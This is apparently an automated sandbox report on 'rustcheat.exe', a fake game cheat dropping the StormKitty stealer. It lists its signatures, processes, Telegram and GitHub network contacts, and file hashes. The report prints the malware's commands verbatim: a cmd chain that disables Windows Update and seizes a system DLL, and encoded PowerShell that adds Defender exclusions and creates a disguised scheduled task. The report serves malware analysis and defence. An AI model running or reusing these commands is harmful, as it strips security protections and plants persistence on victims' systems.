Malware Analysis Report

2025-01-03 06:39

Sample ID 230812-pwffradg5v
Target rustcheat.exe
SHA256 d369a5d2ef50b7e9eea2e61b45294270c0a27cad70edb47cf61ba76f1810fad7
Tags
stormkitty discovery evasion exploit stealer vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d369a5d2ef50b7e9eea2e61b45294270c0a27cad70edb47cf61ba76f1810fad7

Threat Level: Known bad

The file rustcheat.exe was found to be: Known bad.

Malicious Activity Summary

stormkitty discovery evasion exploit stealer vmprotect

Modifies security service

StormKitty payload

StormKitty

Stops running service(s)

Possible privilege escalation attempt

Downloads MZ/PE file

Modifies file permissions

Executes dropped EXE

VMProtect packed file

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Kills process with taskkill

Modifies system certificate store

Delays execution with timeout.exe

Suspicious use of WriteProcessMemory

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 12:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-12 12:40

Reported

2023-08-12 12:43

Platform

win10v2004-20230703-en

Max time kernel

12s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\system32\reg.exe N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\testy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\testy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\testy.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1936 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 1936 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\testy.exe
PID 1936 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 1936 wrote to memory of 1496 N/A C:\Users\Admin\AppData\Local\Temp\rustcheat.exe C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe
PID 2576 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2576 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2576 wrote to memory of 4448 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2576 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 2576 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\testy.exe C:\Windows\System32\cmd.exe
PID 4448 wrote to memory of 4420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 4420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1200 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1200 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1480 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3416 wrote to memory of 2044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 2044 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4448 wrote to memory of 4884 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 4884 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 1148 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4448 wrote to memory of 4384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3416 wrote to memory of 4676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 4676 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4448 wrote to memory of 216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 216 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3416 wrote to memory of 4944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 4944 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3416 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4448 wrote to memory of 4436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4540 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4540 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4964 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 4964 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4448 wrote to memory of 1244 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 4448 wrote to memory of 1244 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe

Processes

C:\Users\Admin\AppData\Local\Temp\rustcheat.exe

"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"

C:\Users\Admin\AppData\Local\Temp\testy.exe

"C:\Users\Admin\AppData\Local\Temp\testy.exe"

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

"C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAYgB1AGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAagBlAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBiAG8AcgAjAD4A"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\system32\sc.exe

sc stop wuauserv

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\sc.exe

sc stop bits

C:\Windows\system32\sc.exe

sc stop dosvc

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f

C:\Windows\system32\reg.exe

reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\WaaSMedicSvc.dll

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwAiAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARwBvAG8AZwBsAGUAXABDAGgAcgBvAG0AZQBcAHUAcABkAGEAdABlAHIALgBlAHgAZQAiACcAKQAgADwAIwBhAGYAZQAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuACkAIAA8ACMAaABzAGkAdAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AeQBwAHAAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAG8AcwBpACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAdABlAHMAdAB5AC4AZQB4AGUAJwAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGwAZwBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBkAHEAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f

C:\Windows\system32\reg.exe

reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE

C:\Windows\system32\schtasks.exe

SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\testy.exe

MD5 50bfdd2eb713e8b5ef0899848159542e
SHA1 df80dcd51ec4af47f286f778e8d7f19dedc4d3b8
SHA256 1388cca1ca24c66583a6c1114c534745ed0fec7cb498b4129b6864f774a72d61
SHA512 d5b074e04fb52f010baed42c8f8bad60fbf394843fa5805d553903b1722c517dd97352f2d722605e4e14b5bff24415594dc2f7754ce2d7be8af844f9e4bd48fc

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

C:\Users\Admin\AppData\Local\Temp\StormKittyBuild.exe

MD5 7b8fcb29905e045b7f8c1dc9bc305698
SHA1 1f8f2b29447f871b7b76f6bfb299d1f8c56f2fc8
SHA256 70eca85476c7ddb1f416bdc2678bafb5998d80f5d8da27a4339971b6f0693173
SHA512 d4f4c491bf4ea187f4a41c4b091935dde4c65300494c8d9dd3a242a03e92191b6789f17ffdaf06dbfb967988c2ba2671687b7a14c23682fc3972165df726a0b2

memory/1496-157-0x0000000000230000-0x0000000000280000-memory.dmp

memory/2576-158-0x0000000000D50000-0x000000000116E000-memory.dmp

memory/1496-159-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/2576-160-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/2576-161-0x000000001CE60000-0x000000001CE70000-memory.dmp

memory/1496-162-0x000000001BDC0000-0x000000001BDD0000-memory.dmp

memory/4668-168-0x0000013F95060000-0x0000013F95082000-memory.dmp

memory/4668-173-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nnunhuth.zn0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4668-175-0x0000013F955B0000-0x0000013F955C0000-memory.dmp

memory/4668-174-0x0000013F955B0000-0x0000013F955C0000-memory.dmp

memory/4668-176-0x0000013F955B0000-0x0000013F955C0000-memory.dmp

memory/4668-179-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/1496-180-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/2576-181-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DotNetZip.dll

MD5 6d1c62ec1c2ef722f49b2d8dd4a4df16
SHA1 1bb08a979b7987bc7736a8cfa4779383cb0ecfa6
SHA256 00da1597d92235d3f84da979e2fa5dbf049bafb52c33bd6fc8ee7b29570c124c
SHA512 c0dce8eaa52eb6c319d4be2eec4622bb3380c65b659cfb77ff51a4ada7d3e591e791ee823dad67b5556ffac5c060ff45d09dd1cc21baaf70ba89806647cb3bd2

C:\Users\Admin\AppData\Local\Temp\AnonFileApi.dll

MD5 7a2d5deab61f043394a510f4e2c0866f
SHA1 ca16110c9cf6522cd7bea32895fd0f697442849b
SHA256 75db945388f62f2de3d3eaae911f49495f289244e2fec9b25455c2d686989f69
SHA512 b66b0bf227762348a5ede3c2578d5bc089c222f632a705241bcc63d56620bef238c67ca2bd400ba7874b2bc168e279673b0e105b73282bc69aa21a7fd34bafe0

memory/2576-192-0x000000001CE60000-0x000000001CE70000-memory.dmp

memory/2576-193-0x000000001CD90000-0x000000001CDA2000-memory.dmp

memory/1496-194-0x000000001BDC0000-0x000000001BDD0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4744-205-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

memory/4744-206-0x000001831BD60000-0x000001831BD70000-memory.dmp

memory/4744-207-0x000001831BD60000-0x000001831BD70000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/4744-209-0x000001831BD60000-0x000001831BD70000-memory.dmp

memory/4744-212-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 5802cd85f72d4d1afcf72d5daeb12e0a
SHA1 61f7f3cb6dcf20edfb29f56cb6fabe529cc4a59e
SHA256 91d8fd9f83b068436c733b72e2c128092ce55a56ff936ef6ae042b332ba0edf6
SHA512 fce715c7aca23d2787f6e38d507ace7c49293b0f73dc8525839eb9736d99b82881a9e4904dae2117c577917d1bc161150119b767e26870521c997378f55c3505

C:\Users\Admin\AppData\Local\Temp\Google\Chrome\updater.exe

MD5 5802cd85f72d4d1afcf72d5daeb12e0a
SHA1 61f7f3cb6dcf20edfb29f56cb6fabe529cc4a59e
SHA256 91d8fd9f83b068436c733b72e2c128092ce55a56ff936ef6ae042b332ba0edf6
SHA512 fce715c7aca23d2787f6e38d507ace7c49293b0f73dc8525839eb9736d99b82881a9e4904dae2117c577917d1bc161150119b767e26870521c997378f55c3505

memory/2296-216-0x00007FFF27F00000-0x00007FFF289C1000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 12:40

Reported

2023-08-12 12:43

Platform

win7-20230712-en

Max time kernel

135s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\rustcheat.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security C:\Windows\system32\reg.exe N/A

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Stops running service(s)

evasion

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

